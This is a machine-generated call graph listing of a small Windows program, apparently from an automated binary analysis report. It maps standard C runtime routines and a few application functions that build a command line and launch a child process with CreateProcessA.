__setmbcp_nolock 7778->7784 7780 401ee2 __crtLCMapStringA_stat 5 API calls 7779->7780 7781 404998 7780->7781 7781->7751 7781->7752 7782->7779 7783 404836 GetCPInfo 7782->7783 7783->7779 7783->7784 7789 404502 GetCPInfo 7784->7789 7922 403def LeaveCriticalSection 7786->7922 7788 404b02 7788->7747 7790 4045e8 7789->7790 7793 404536 _memset 7789->7793 7795 401ee2 __crtLCMapStringA_stat 5 API calls 7790->7795 7799 408abc 7793->7799 7797 404693 7795->7797 7797->7784 7798 4088bd ___crtLCMapStringA 102 API calls 7798->7790 7800 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 7799->7800 7801 408acf 7800->7801 7809 408902 7801->7809 7804 4088bd 7805 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 7804->7805 7806 4088d0 7805->7806 7875 408518 7806->7875 7810 408923 GetStringTypeW 7809->7810 7811 40894e 7809->7811 7812 408943 GetLastError 7810->7812 7814 40893b 7810->7814 7811->7814 7815 408a35 7811->7815 7812->7811 7813 408987 MultiByteToWideChar 7816 408a2f 7813->7816 7822 4089b4 7813->7822 7814->7813 7814->7816 7837 40a79a GetLocaleInfoA 7815->7837 7818 401ee2 __crtLCMapStringA_stat 5 API calls 7816->7818 7820 4045a3 7818->7820 7820->7804 7821 408a86 GetStringTypeA 7821->7816 7825 408aa1 7821->7825 7826 4089c9 _memset __crtLCMapStringA_stat 7822->7826 7827 406a32 _malloc 67 API calls 7822->7827 7824 408a02 MultiByteToWideChar 7829 408a18 GetStringTypeW 7824->7829 7830 408a29 7824->7830 7831 403a8d __crtLCMapStringA_stat 67 API calls 7825->7831 7826->7816 7826->7824 7827->7826 7829->7830 7833 4084f8 7830->7833 7831->7816 7834 408504 7833->7834 7835 408515 7833->7835 7834->7835 7836 403a8d __crtLCMapStringA_stat 67 API calls 7834->7836 7835->7816 7836->7835 7838 40a7c8 7837->7838 7839 40a7cd 7837->7839 7841 401ee2 __crtLCMapStringA_stat 5 API calls 7838->7841 7868 40ab36 7839->7868 7842 408a59 7841->7842 7842->7816 7842->7821 7843 40a7e3 7842->7843 7844 40a823 GetCPInfo 7843->7844 7848 40a8ad 7843->7848 7845 40a898 MultiByteToWideChar 7844->7845 7846 40a83a 7844->7846 7845->7848 7853 40a853 _strlen 7845->7853 7846->7845 7849 40a840 GetCPInfo 7846->7849 7847 401ee2 __crtLCMapStringA_stat 5 API calls 7851 408a7a 7847->7851 7848->7847 7849->7845 7852 40a84d 7849->7852 7850 40a885 _memset __crtLCMapStringA_stat 7850->7848 7855 40a8e2 MultiByteToWideChar 7850->7855 7851->7816 7851->7821 7852->7845 7852->7853 7853->7850 7854 406a32 _malloc 67 API calls 7853->7854 7854->7850 7856 40a919 7855->7856 7857 40a8fa 7855->7857 7858 4084f8 __freea 67 API calls 7856->7858 7859 40a901 WideCharToMultiByte 7857->7859 7860 40a91e 7857->7860 7858->7848 7859->7856 7861 40a929 WideCharToMultiByte 7860->7861 7862 40a93d 7860->7862 7861->7856 7861->7862 7863 4039a1 __calloc_crt 67 API calls 7862->7863 7864 40a945 7863->7864 7864->7856 7865 40a94e WideCharToMultiByte 7864->7865 7865->7856 7866 40a960 7865->7866 7867 403a8d __crtLCMapStringA_stat 67 API calls 7866->7867 7867->7856 7871 409c56 7868->7871 7872 409c6f 7871->7872 7873 409a27 strtoxl 91 API calls 7872->7873 7874 409c7c 7873->7874 7874->7838 7876 408539 LCMapStringW 7875->7876 7880 408554 7875->7880 7877 40855c GetLastError 7876->7877 7876->7880 7877->7880 7878 408752 7882 40a79a ___ansicp 91 API calls 7878->7882 7879 4085ae 7881 4085c7 MultiByteToWideChar 7879->7881 7898 408749 7879->7898 7880->7878 7880->7879 7886 4085f4 7881->7886 7881->7898 7884 40877a 7882->7884 7883 401ee2 __crtLCMapStringA_stat 5 API calls 7885 4045c3 7883->7885 7887 408793 7884->7887 7888 40886e LCMapStringA 7884->7888 7884->7898 7885->7798 7896 406a32 _malloc 67 API calls 7886->7896 7903 40860d __crtLCMapStringA_stat 7886->7903 7891 40a7e3 ___convertcp 74 API calls 7887->7891 7890 4087ca 7888->7890 7889 408645 MultiByteToWideChar 7893 408740 7889->7893 7894 40865e LCMapStringW 7889->7894 7895 408895 7890->7895 7901 403a8d __crtLCMapStringA_stat 67 API calls 7890->7901 7892 4087a5 7891->7892 7897 4087af LCMapStringA 7892->7897 7892->7898 7899 4084f8 __freea 67 API calls 7893->7899 7894->7893 7900 40867f 7894->7900 7895->7898 7904 403a8d __crtLCMapStringA_stat 67 API calls 7895->7904 7896->7903 7897->7890 7906 4087d1 7897->7906 7898->7883 7899->7898 7902 408688 7900->7902 7908 4086b1 7900->7908 7901->7895 7902->7893 7905 40869a LCMapStringW 7902->7905 7903->7889 7903->7898 7904->7898 7905->7893 7910 4087e2 _memset __crtLCMapStringA_stat 7906->7910 7912 406a32 _malloc 67 API calls 7906->7912 7907 408700 LCMapStringW 7913 408718 WideCharToMultiByte 7907->7913 7914 40873a 7907->7914 7909 4086cc __crtLCMapStringA_stat 7908->7909 7911 406a32 _malloc 67 API calls 7908->7911 7909->7893 7909->7907 7910->7890 7916 408820 LCMapStringA 7910->7916 7911->7909 7912->7910 7913->7914 7915 4084f8 __freea 67 API calls 7914->7915 7915->7893 7917 408840 7916->7917 7918 40883c 7916->7918 7920 40a7e3 ___convertcp 74 API calls 7917->7920 7921 4084f8 __freea 67 API calls 7918->7921 7920->7918 7921->7890 7922->7788 7924 4059a4 7923->7924 7925 404e77 __encode_pointer 6 API calls 7924->7925 7926 4059bc 7924->7926 7925->7924 7926->7087 7930 4058ff 7927->7930 7929 405948 7929->7089 7931 40590b _doexit 7930->7931 7938 4021d0 7931->7938 7937 40592c _doexit 7937->7929 7939 403ec9 __lock 67 API calls 7938->7939 7940 4021d7 7939->7940 7941 405814 7940->7941 7942 404ef2 __decode_pointer 6 API calls 7941->7942 7943 405828 7942->7943 7944 404ef2 __decode_pointer 6 API calls 7943->7944 7945 405838 7944->7945 7953 4058bb 7945->7953 7961 40972b 7945->7961 7947 404e77 __encode_pointer 6 API calls 7949 4058b0 7947->7949 7948 405856 7950 40587a 7948->7950 7957 4058a2 7948->7957 7974 4039ed 7948->7974 7951 404e77 __encode_pointer 6 API calls 7949->7951 7950->7953 7954 4039ed __realloc_crt 73 API calls 7950->7954 7955 405890 7950->7955 7951->7953 7958 405935 7953->7958 7954->7955 7955->7953 7956 404e77 __encode_pointer 6 API calls 7955->7956 7956->7957 7957->7947 8023 4021d9 7958->8023 7962 409737 _doexit 7961->7962 7963 409764 7962->7963 7964 409747 7962->7964 7965 4097a5 HeapSize 7963->7965 7967 403ec9 __lock 67 API calls 7963->7967 7966 403724 strtoxl 67 API calls 7964->7966 7970 40975c _doexit 7965->7970 7968 40974c 7966->7968 7971 409774 ___sbh_find_block 7967->7971 7969 4036bc strtoxl 6 API calls 7968->7969 7969->7970 7970->7948 7979 4097c5 7971->7979 7978 4039f6 7974->7978 7976 403a35 7976->7950 7977 403a16 Sleep 7977->7978 7978->7976 7978->7977 7983 406afc 7978->7983 7982 403def LeaveCriticalSection 7979->7982 7981 4097a0 7981->7965 7981->7970 7982->7981 7984 406b08 _doexit 7983->7984 7985 406b1d 7984->7985 7986 406b0f 7984->7986 7987 406b30 7985->7987 7988 406b24 7985->7988 7989 406a32 _malloc 67 API calls 7986->7989 7995 406ca2 7987->7995 8017 406b3d ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 7987->8017 7990 403a8d __crtLCMapStringA_stat 67 API calls 7988->7990 8005 406b17 __dosmaperr _doexit 7989->8005 7990->8005 7991 406cd5 7993 405f66 _malloc 6 API calls 7991->7993 7992 406ca7 HeapReAlloc 7992->7995 7992->8005 7996 406cdb 7993->7996 7994 403ec9 __lock 67 API calls 7994->8017 7995->7991 7995->7992 7997 406cf9 7995->7997 7999 405f66 _malloc 6 API calls 7995->7999 8001 406cef 7995->8001 7998 403724 strtoxl 67 API calls 7996->7998 8000 403724 strtoxl 67 API calls 7997->8000 7997->8005 7998->8005 7999->7995 8002 406d02 GetLastError 8000->8002 8004 403724 strtoxl 67 API calls 8001->8004 8002->8005 8006 406c70 8004->8006 8005->7978 8006->8005 8008 406c75 GetLastError 8006->8008 8007 406bc8 HeapAlloc 8007->8017 8008->8005 8009 406c1d HeapReAlloc 8009->8017 8010 407571 ___sbh_alloc_block 5 API calls 8010->8017 8011 406c88 8011->8005 8013 403724 strtoxl 67 API calls 8011->8013 8012 405f66 _malloc 6 API calls 8012->8017 8015 406c95 8013->8015 8014 406c6b 8016 403724 strtoxl 67 API calls 8014->8016 8015->8002 8015->8005 8016->8006 8017->7991 8017->7994 8017->8005 8017->8007 8017->8009 8017->8010 8017->8011 8017->8012 8017->8014 8018 406dc2 VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 8017->8018 8019 406c40 8017->8019 8018->8017 8022 403def LeaveCriticalSection 8019->8022 8021 406c47 8021->8017 8022->8021 8026 403def LeaveCriticalSection 8023->8026 8025 4021e0 8025->7937 8026->8025 8028 401518 8027->8028 8069 40c991 8028->8069 8030 40158a 8031 401594 __stbuf 8030->8031 8032 4015c8 8030->8032 8082 4017c5 8031->8082 8105 40c175 8032->8105 8034 4015dc 8135 40a091 8034->8135 8037 4015ac 8038 401ee2 __crtLCMapStringA_stat 5 API calls 8037->8038 8039 4015c1 8038->8039 8039->7092 8040 4015e9 _strncmp 8158 4011f0 8040->8158 8048 401689 __stbuf 8049 4017c5 _fprintf 105 API calls 8048->8049 8051 401757 8049->8051 8050 4016bd 8052 4016ea 8050->8052 8055 401000 67 API calls 8050->8055 8053 401ee2 __crtLCMapStringA_stat 5 API calls 8051->8053 8054 401000 67 API calls 8052->8054 8056 40176f 8053->8056 8057 4016f4 8054->8057 8055->8050 8056->7092 8058 40171f 8057->8058 8059 401000 67 API calls 8057->8059 8060 401731 8058->8060 8061 401776 8058->8061 8059->8057 8194 40bb64 8060->8194 8203 401410 8061->8203 8066 401790 8067 401ee2 __crtLCMapStringA_stat 5 API calls 8066->8067 8068 4017a3 8067->8068 8068->7092 8070 40c99d _doexit 8069->8070 8071 40c9b2 8070->8071 8072 40c9cf 8070->8072 8074 403724 strtoxl 67 API calls 8071->8074 8219 40c272 8072->8219 8076 40c9b7 8074->8076 8078 4036bc strtoxl 6 API calls 8076->8078 8081 40c9c7 _doexit 8078->8081 8080 403724 strtoxl 67 API calls 8080->8081 8081->8030 8083 4017d1 _doexit 8082->8083 8084 4017e4 8083->8084 8086 401810 8083->8086 8085 403724 strtoxl 67 API calls 8084->8085 8087 4017e9 8085->8087 8547 4019b8 8086->8547 8089 4036bc strtoxl 6 API calls 8087->8089 8096 4017f9 _doexit 8089->8096 8092 401829 8100 403724 strtoxl 67 API calls 8092->8100 8104 401893 8092->8104 8096->8037 8102 401883 8100->8102 8101 4018bf 8591 4018d7 8101->8591 8103 4036bc strtoxl 6 API calls 8102->8103 8103->8104 8104->8101 8553 4025f1 8104->8553 8106 40c181 _doexit 8105->8106 8107 40c1a4 8106->8107 8108 40c189 8106->8108 8109 40c1b2 8107->8109 8114 40c1f3 8107->8114 8110 403737 __set_osfhnd 67 API calls 8108->8110 8111 403737 __set_osfhnd 67 API calls 8109->8111 8112 40c18e 8110->8112 8113 40c1b7 8111->8113 8115 403724 strtoxl 67 API calls 8112->8115 8116 403724 strtoxl 67 API calls 8113->8116 8117 40c200 8114->8117 8118 40c214 8114->8118 8125 40c196 _doexit 8115->8125 8120 40c1be 8116->8120 8121 403737 __set_osfhnd 67 API calls 8117->8121 8119 40a539 ___lock_fhandle 68 API calls 8118->8119 8122 40c21a 8119->8122 8128 4036bc strtoxl 6 API calls 8120->8128 8123 40c205 8121->8123 8126 40c227 8122->8126 8127 40c23d 8122->8127 8124 403724 strtoxl 67 API calls 8123->8124 8124->8120 8125->8034 8607 40bbb3 8126->8607 8130 403724 strtoxl 67 API calls 8127->8130 8128->8125 8132 40c242 8130->8132 8131 40c235 8671 40c268 8131->8671 8133 403737 __set_osfhnd 67 API calls 8132->8133 8133->8131 8136 40a09d _doexit 8135->8136 8137 40a0c0 8136->8137 8138 40a0a5 8136->8138 8140 40a0ce 8137->8140 8143 40a10f 8137->8143 8139 403737 __set_osfhnd 67 API calls 8138->8139 8141 40a0aa 8139->8141 8142 403737 __set_osfhnd 67 API calls 8140->8142 8144 403724 strtoxl 67 API calls 8141->8144 8145 40a0d3 8142->8145 8146 40a539 ___lock_fhandle 68 API calls 8143->8146 8155 40a0b2 _doexit 8144->8155 8147 403724 strtoxl 67 API calls 8145->8147 8148 40a115 8146->8148 8149 40a0da 8147->8149 8150 40a130 8148->8150 8151 40a122 8148->8151 8152 4036bc strtoxl 6 API calls 8149->8152 8154 403724 strtoxl 67 API calls 8150->8154 8153 409ff5 __close_nolock 70 API calls 8151->8153 8152->8155 8156 40a12a 8153->8156 8154->8156 8155->8040 8675 40a154 8156->8675 8159 401200 8158->8159 8159->8159 8160 401a96 _calloc 67 API calls 8159->8160 8161 401211 8160->8161 8679 401fc9 8161->8679 8163 40122f 8164 401fc9 91 API calls 8163->8164 8167 401248 _memset 8163->8167 8164->8163 8165 401fc9 91 API calls 8165->8167 8166 401312 8168 4010a0 8166->8168 8167->8165 8167->8166 8169 4010cc 8168->8169 8696 401e96 8169->8696 8172 4011b1 8173 401a96 _calloc 67 API calls 8172->8173 8182 401197 _strncpy 8173->8182 8174 401118 8175 401e96 __wsplitpath 77 API calls 8174->8175 8176 401138 8175->8176 8699 401c84 8176->8699 8177 401ee2 __crtLCMapStringA_stat 5 API calls 8178 4011e0 8177->8178 8178->8048 8183 401a96 8178->8183 8181 401a96 _calloc 67 API calls 8181->8182 8182->8177 8184 403efc __calloc_impl 67 API calls 8183->8184 8185 401ab0 8184->8185 8186 403724 strtoxl 67 API calls 8185->8186 8189 4016b1 8185->8189 8187 401ac3 8186->8187 8188 403724 strtoxl 67 API calls 8187->8188 8187->8189 8188->8189 8190 401000 8189->8190 8191 401008 8190->8191 8191->8191 8192 401a96 _calloc 67 API calls 8191->8192 8193 401023 _memset 8192->8193 8193->8050 8195 40bb73 8194->8195 8199 40bb90 8194->8199 8196 403724 strtoxl 67 API calls 8195->8196 8197 40bb78 8196->8197 8198 4036bc strtoxl 6 API calls 8197->8198 8200 40bb88 8198->8200 8199->8195 8201 40bba5 8199->8201 8200->8048 8788 40cac0 8201->8788 8204 401420 8203->8204 8205 401a96 _calloc 67 API calls 8204->8205 8206 40146e 8205->8206 9156 401ff7 8206->9156 8208 4014d2 8211 401350 8208->8211 8209 40147c 8209->8208 8210 401ff7 _sprintf 103 API calls 8209->8210 8210->8209 8212 401ae0 _memset 8211->8212 8213 40137a SetConsoleCtrlHandler CreateProcessA 8212->8213 8214 4013d5 WaitForSingleObject GetExitCodeProcess 8213->8214 8216 4013b9 __stbuf 8213->8216 8215 401406 8214->8215 8214->8216 8215->8066 8217 4017c5 _fprintf 105 API calls 8216->8217 8218 4013cc 8217->8218 8218->8066 8220 40c297 8219->8220 8286 40cfc2 8220->8286 8223 40c2b8 8224 403594 __invoke_watson 10 API calls 8223->8224 8225 40c2c2 8224->8225 8229 40c2c5 8225->8229 8226 40c2fb 8310 403737 8226->8310 8229->8226 8233 40c3bb 8229->8233 8230 403724 strtoxl 67 API calls 8231 40c30a 8230->8231 8232 4036bc strtoxl 6 API calls 8231->8232 8256 40c319 8232->8256 8292 40a600 8233->8292 8235 40c45d 8236 40c464 8235->8236 8237 40c47e CreateFileA 8235->8237 8238 403737 __set_osfhnd 67 API calls 8236->8238 8239 40c518 GetFileType 8237->8239 8240 40c4ab 8237->8240 8243 40c469 8238->8243 8241 40c525 GetLastError 8239->8241 8242 40c569 8239->8242 8244 40c4e4 GetLastError 8240->8244 8248 40c4bf CreateFileA 8240->8248 8246 40374a __dosmaperr 67 API calls 8241->8246 8318 40a3bb 8242->8318 8247 403724 strtoxl 67 API calls 8243->8247 8313 40374a 8244->8313 8250 40c54e CloseHandle 8246->8250 8249 40c473 8247->8249 8248->8239 8248->8244 8254 403724 strtoxl 67 API calls 8249->8254 8250->8249 8252 40c55c 8250->8252 8255 403724 strtoxl 67 API calls 8252->8255 8254->8256 8257 40c561 8255->8257 8282 40ca0d 8256->8282 8257->8249 8258 40c88c 8258->8256 8262 40c914 CloseHandle CreateFileA 8258->8262 8259 40c5e1 8327 40ce91 8259->8327 8261 40c652 8261->8258 8275 40c5fd 8261->8275 8383 40807c 8261->8383 8264 40c81c 8262->8264 8265 40c93f GetLastError 8262->8265 8264->8256 8267 40374a __dosmaperr 67 API calls 8265->8267 8266 40bbb3 77 API calls __read_nolock 8266->8275 8269 40c94b 8267->8269 8268 403737 __set_osfhnd 67 API calls 8268->8275 8408 40a43c 8269->8408 8271 40ce91 69 API calls __lseek_nolock 8271->8275 8275->8261 8275->8266 8275->8271 8276 409390 69 API calls __lseeki64_nolock 8275->8276 8277 40c80f 8275->8277 8281 40c7a7 8275->8281 8337 409ff5 8275->8337 8352 40ccdb 8275->8352 8276->8275 8278 409ff5 __close_nolock 70 API calls 8277->8278 8279 40c816 8278->8279 8280 403724 strtoxl 67 API calls 8279->8280 8280->8264 8281->8258 8283 40ca12 8282->8283 8284 40c9fb 8282->8284 8546 40a5d9 LeaveCriticalSection 8283->8546 8284->8080 8284->8081 8287 40cfd1 8286->8287 8288 40c2b3 8286->8288 8289 403724 strtoxl 67 API calls 8287->8289 8288->8223 8288->8229 8290 40cfd6 8289->8290 8291 4036bc strtoxl 6 API calls 8290->8291 8291->8288 8293 40a60c _doexit 8292->8293 8294 403e06 __mtinitlocknum 67 API calls 8293->8294 8295 40a61c 8294->8295 8296 403ec9 __lock 67 API calls 8295->8296 8297 40a621 _doexit 8295->8297 8307 40a630 8296->8307 8297->8235 8298 40a773 8430 40a791 8298->8430 8299 40a709 8301 4039a1 __calloc_crt 67 API calls 8299->8301 8305 40a712 8301->8305 8302 40a6b1 EnterCriticalSection 8304 40a6c1 LeaveCriticalSection 8302->8304 8302->8307 8303 403ec9 __lock 67 API calls 8303->8307 8304->8307 8305->8298 8420 40a539 8305->8420 8307->8298 8307->8299 8307->8302 8307->8303 8309 405ef7 __alloc_osfhnd InitializeCriticalSectionAndSpinCount 8307->8309 8417 40a6d3 8307->8417 8309->8307 8311 4050c5 __getptd_noexit 67 API calls 8310->8311 8312 40373c 8311->8312 8312->8230 8314 403737 __set_osfhnd 67 API calls 8313->8314 8315 403755 __dosmaperr 8314->8315 8316 403724 strtoxl 67 API calls 8315->8316 8317 403768 8316->8317 8317->8249 8319 40a422 8318->8319 8320 40a3c9 8318->8320 8321 403724 strtoxl 67 API calls 8319->8321 8320->8319 8325 40a3ed 8320->8325 8322 40a427 8321->8322 8324 403737 __set_osfhnd 67 API calls 8322->8324 8323 40a418 8323->8258 8323->8259 8323->8261 8324->8323 8325->8323 8326 40a412 SetStdHandle 8325->8326 8326->8323 8439 40a4c2 8327->8439 8329 40cea0 8330 40ceb6 SetFilePointer 8329->8330 8331 40cea6 8329->8331 8333 40ced5 8330->8333 8334 40cecd GetLastError 8330->8334 8332 403724 strtoxl 67 API calls 8331->8332 8336 40c5ee 8332->8336 8335 40374a __dosmaperr 67 API calls 8333->8335 8333->8336 8334->8333 8335->8336 8336->8268 8336->8275 8338 40a4c2 __lseek_nolock 67 API calls 8337->8338 8339 40a005 8338->8339 8340 40a05b 8339->8340 8342 40a039 8339->8342 8345 40a4c2 __lseek_nolock 67 API calls 8339->8345 8341 40a43c __free_osfhnd 68 API calls 8340->8341 8344 40a063 8341->8344 8342->8340 8343 40a4c2 __lseek_nolock 67 API calls 8342->8343 8346 40a045 CloseHandle 8343->8346 8347 40a085 8344->8347 8350 40374a __dosmaperr 67 API calls 8344->8350 8348 40a030 8345->8348 8346->8340 8349 40a051 GetLastError 8346->8349 8347->8275 8351 40a4c2 __lseek_nolock 67 API calls 8348->8351 8349->8340 8350->8347 8351->8342 8452 409390 8352->8452 8355 403724 strtoxl 67 API calls 8365 40cd68 8355->8365 8356 409390 __lseeki64_nolock 69 API calls 8357 40cd16 8356->8357 8358 40cd3c GetProcessHeap HeapAlloc 8357->8358 8361 40cdf8 8357->8361 8362 40cd5d 8357->8362 8360 40cd58 8358->8360 8371 40cd6f __setmode_nolock 8358->8371 8359 409390 __lseeki64_nolock 69 API calls 8359->8362 8363 403724 strtoxl 67 API calls 8360->8363 8364 409390 __lseeki64_nolock 69 API calls 8361->8364 8379 40ce61 8361->8379 8362->8355 8362->8365 8363->8362 8366 40ce11 8364->8366 8365->8275 8366->8362 8367 40a4c2 __lseek_nolock 67 API calls 8366->8367 8368 40ce27 SetEndOfFile 8367->8368 8370 40ce44 8368->8370 8368->8379 8372 403724 strtoxl 67 API calls 8370->8372 8373 40cddb 8371->8373 8382 40cdb2 __setmode_nolock 8371->8382 8462 407949 8371->8462 8374 40ce49 8372->8374 8375 403737 __set_osfhnd 67 API calls 8373->8375 8376 403737 __set_osfhnd 67 API calls 8374->8376 8377 40cde0 8375->8377 8378 40ce54 GetLastError 8376->8378 8381 403724 strtoxl 67 API calls 8377->8381 8377->8382 8378->8379 8379->8359 8379->8362 8380 40cdc0 GetProcessHeap HeapFree 8380->8379 8381->8382 8382->8380 8384 408088 _doexit 8383->8384 8385 408090 8384->8385 8386 4080ab 8384->8386 8388 403737 __set_osfhnd 67 API calls 8385->8388 8387 4080b9 8386->8387 8393 4080fa 8386->8393 8390 403737 __set_osfhnd 67 API calls 8387->8390 8389 408095 8388->8389 8391 403724 strtoxl 67 API calls 8389->8391 8392 4080be 8390->8392 8403 40809d _doexit 8391->8403 8394 403724 strtoxl 67 API calls 8392->8394 8395 40a539 ___lock_fhandle 68 API calls 8393->8395 8397 4080c5 8394->8397 8396 408100 8395->8396 8398 408123 8396->8398 8399 40810d 8396->8399 8400 4036bc strtoxl 6 API calls 8397->8400 8402 403724 strtoxl 67 API calls 8398->8402 8401 407949 __write_nolock 99 API calls 8399->8401 8400->8403 8404 40811b 8401->8404 8405 408128 8402->8405 8403->8261 8542 40814e 8404->8542 8406 403737 __set_osfhnd 67 API calls 8405->8406 8406->8404 8409 40a4a8 8408->8409 8410 40a44d 8408->8410 8411 403724 strtoxl 67 API calls 8409->8411 8410->8409 8415 40a478 8410->8415 8412 40a4ad 8411->8412 8413 403737 __set_osfhnd 67 API calls 8412->8413 8414 40a49e 8413->8414 8414->8264 8415->8414 8416 40a498 SetStdHandle 8415->8416 8416->8414 8433 403def LeaveCriticalSection 8417->8433 8419 40a6da 8419->8307 8421 40a545 _doexit 8420->8421 8422 40a5a0 8421->8422 8425 403ec9 __lock 67 API calls 8421->8425 8423 40a5c2 _doexit 8422->8423 8424 40a5a5 EnterCriticalSection 8422->8424 8423->8298 8424->8423 8426 40a571 8425->8426 8427 40a588 8426->8427 8428 405ef7 __alloc_osfhnd InitializeCriticalSectionAndSpinCount 8426->8428 8434 40a5d0 8427->8434 8428->8427 8438 403def LeaveCriticalSection 8430->8438 8432 40a798 8432->8297 8433->8419 8437 403def LeaveCriticalSection 8434->8437 8436 40a5d7 8436->8422 8437->8436 8438->8432 8440 40a4e7 8439->8440 8441 40a4cf 8439->8441 8443 403737 __set_osfhnd 67 API calls 8440->8443 8448 40a52c 8440->8448 8442 403737 __set_osfhnd 67 API calls 8441->8442 8444 40a4d4 8442->8444 8445 40a515 8443->8445 8446 403724 strtoxl 67 API calls 8444->8446 8447 403724 strtoxl 67 API calls 8445->8447 8449 40a4dc 8446->8449 8450 40a51c 8447->8450 8448->8329 8449->8329 8451 4036bc strtoxl 6 API calls 8450->8451 8451->8448 8453 40a4c2 __lseek_nolock 67 API calls 8452->8453 8454 4093ae 8453->8454 8455 4093b6 8454->8455 8456 4093c7 SetFilePointer 8454->8456 8458 403724 strtoxl 67 API calls 8455->8458 8457 4093df GetLastError 8456->8457 8461 4093bb 8456->8461 8459 4093e9 8457->8459 8457->8461 8458->8461 8460 40374a __dosmaperr 67 API calls 8459->8460 8460->8461 8461->8356 8461->8362 8463 407958 __write_nolock 8462->8463 8464 4079b1 8463->8464 8465 40798a 8463->8465 8497 40797f 8463->8497 8469 407a19 8464->8469 8470 4079f3 8464->8470 8466 403737 __set_osfhnd 67 API calls 8465->8466 8468 40798f 8466->8468 8467 401ee2 __crtLCMapStringA_stat 5 API calls 8471 40807a 8467->8471 8474 403724 strtoxl 67 API calls 8468->8474 8472 407a30 8469->8472 8473 407a1f 8469->8473 8475 403737 __set_osfhnd 67 API calls 8470->8475 8471->8371 8527 40650e 8472->8527 8476 409390 __lseeki64_nolock 69 API calls 8473->8476 8477 407996 8474->8477 8479 4079f8 8475->8479 8480 407a2d 8476->8480 8481 4036bc strtoxl 6 API calls 8477->8481 8483 403724 strtoxl 67 API calls 8479->8483 8480->8472 8481->8497 8482 407a38 8484 407cde 8482->8484 8489 40513e __getptd 67 API calls 8482->8489 8485 407a01 8483->8485 8487 407fad WriteFile 8484->8487 8488 407cee 8484->8488 8486 4036bc strtoxl 6 API calls 8485->8486 8486->8497 8490 407fe0 GetLastError 8487->8490 8491 407ea7 8487->8491 8492 407dcc 8488->8492 8514 407d02 8488->8514 8493 407a53 GetConsoleMode 8489->8493 8494 407cc0 8490->8494 8491->8494 8503 407eac 8492->8503 8506 407ddb 8492->8506 8493->8484 8496 407a7e 8493->8496 8495 40802b 8494->8495 8494->8497 8500 407ffe 8494->8500 8495->8497 8499 403724 strtoxl 67 API calls 8495->8499 8496->8484 8498 407a90 GetConsoleCP 8496->8498 8497->8467 8498->8494 8525 407ab3 8498->8525 8501 40804e 8499->8501 8504 408009 8500->8504 8505 40801d 8500->8505 8508 403737 __set_osfhnd 67 API calls 8501->8508 8502 407f12 WideCharToMultiByte 8502->8490 8510 407f49 WriteFile 8502->8510 8503->8495 8503->8502 8509 403724 strtoxl 67 API calls 8504->8509 8512 40374a __dosmaperr 67 API calls 8505->8512 8506->8495 8511 407e50 WriteFile 8506->8511 8507 407d70 WriteFile 8507->8490 8507->8514 8508->8497 8515 40800e 8509->8515 8513 407f80 GetLastError 8510->8513 8519 407f74 8510->8519 8511->8490 8516 407de6 8511->8516 8512->8497 8513->8519 8514->8494 8514->8495 8514->8507 8518 403737 __set_osfhnd 67 API calls 8515->8518 8516->8491 8516->8494 8516->8506 8518->8497 8519->8491 8519->8494 8519->8503 8519->8510 8520 407b5f WideCharToMultiByte 8520->8494 8522 407b90 WriteFile 8520->8522 8521 40a36b 79 API calls __fassign 8521->8525 8522->8490 8523 407bb7 8522->8523 8523->8490 8523->8494 8524 40a18f 11 API calls __putwch_nolock 8523->8524 8523->8525 8526 407be4 WriteFile 8523->8526 8524->8523 8525->8494 8525->8520 8525->8521 8525->8523 8536 4067dc 8525->8536 8526->8490 8526->8523 8528 40652a 8527->8528 8529 40651b 8527->8529 8532 40654e 8528->8532 8533 403724 strtoxl 67 API calls 8528->8533 8530 403724 strtoxl 67 API calls 8529->8530 8531 406520 8530->8531 8531->8482 8532->8482 8534 40653e 8533->8534 8535 4036bc strtoxl 6 API calls 8534->8535 8535->8532 8539 4067a4 8536->8539 8540 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8539->8540 8541 4067b7 8540->8541 8541->8525 8545 40a5d9 LeaveCriticalSection 8542->8545 8544 408156 8544->8403 8545->8544 8546->8284 8548 4019ca 8547->8548 8549 4019ec EnterCriticalSection 8547->8549 8548->8549 8550 4019d2 8548->8550 8551 401819 8549->8551 8552 403ec9 __lock 67 API calls 8550->8552 8551->8104 8585 403553 8551->8585 8552->8551 8554 403553 __fileno 67 API calls 8553->8554 8555 402600 8554->8555 8556 40650e __stbuf 67 API calls 8555->8556 8558 402606 __stbuf 8556->8558 8557 4018a5 8560 402767 8557->8560 8558->8557 8559 40395c __malloc_crt 67 API calls 8558->8559 8559->8557 8561 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8560->8561 8562 4027ce 8561->8562 8563 4027d2 8562->8563 8566 403553 __fileno 67 API calls 8562->8566 8580 402813 __output_l __aulldvrm _strlen 8562->8580 8564 403724 strtoxl 67 API calls 8563->8564 8565 4027d7 8564->8565 8567 4036bc strtoxl 6 API calls 8565->8567 8566->8580 8568 4027e9 8567->8568 8569 401ee2 __crtLCMapStringA_stat 5 API calls 8568->8569 8570 4018b5 8569->8570 8581 40268d 8570->8581 8571 4067a4 __isleadbyte_l 77 API calls 8571->8580 8572 4026c1 101 API calls _write_string 8572->8580 8573 403a8d __crtLCMapStringA_stat 67 API calls 8573->8580 8574 4026f4 101 API calls _write_multi_char 8574->8580 8575 406787 79 API calls __cftof 8575->8580 8576 40395c __malloc_crt 67 API calls 8576->8580 8577 40271a 101 API calls _write_string 8577->8580 8578 404ef2 6 API calls __decode_pointer 8579 402bb7 8578->8579 8579->8578 8579->8580 8580->8563 8580->8568 8580->8571 8580->8572 8580->8573 8580->8574 8580->8575 8580->8576 8580->8577 8580->8579 8582 4026ab 8581->8582 8583 402698 8581->8583 8582->8101 8583->8582 8594 403bba 8583->8594 8586 403562 8585->8586 8587 403577 8585->8587 8588 403724 strtoxl 67 API calls 8586->8588 8587->8092 8589 403567 8588->8589 8590 4036bc strtoxl 6 API calls 8589->8590 8590->8587 8600 401a2b 8591->8600 8593 4018df 8593->8096 8595 403bd3 8594->8595 8599 403bf5 8594->8599 8596 403553 __fileno 67 API calls 8595->8596 8595->8599 8597 403bee 8596->8597 8598 40807c __locking 101 API calls 8597->8598 8598->8599 8599->8582 8601 401a5b LeaveCriticalSection 8600->8601 8602 401a3c 8600->8602 8601->8593 8602->8601 8603 401a43 8602->8603 8606 403def LeaveCriticalSection 8603->8606 8605 401a58 8605->8593 8606->8605 8608 40bbea 